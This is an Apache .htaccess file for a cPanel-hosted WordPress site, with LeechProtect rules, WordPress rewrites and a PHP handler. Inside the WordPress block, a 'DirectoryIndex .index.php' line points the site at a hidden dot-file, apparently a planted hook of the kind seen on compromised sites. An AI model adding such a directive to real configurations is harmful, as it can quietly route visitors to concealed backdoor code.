RewriteEngine on
RewriteCond ${LeechProtect:/home/wemoveit/public_html:%{REMOTE_USER}:%{REMOTE_ADDR}:6:oI90E41ZwmjMi5WU0114toQADWQpUB2U} leech
RewriteRule .* /
# BEGIN WordPress
DirectoryIndex .index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php72” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php72 .php .php7 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit
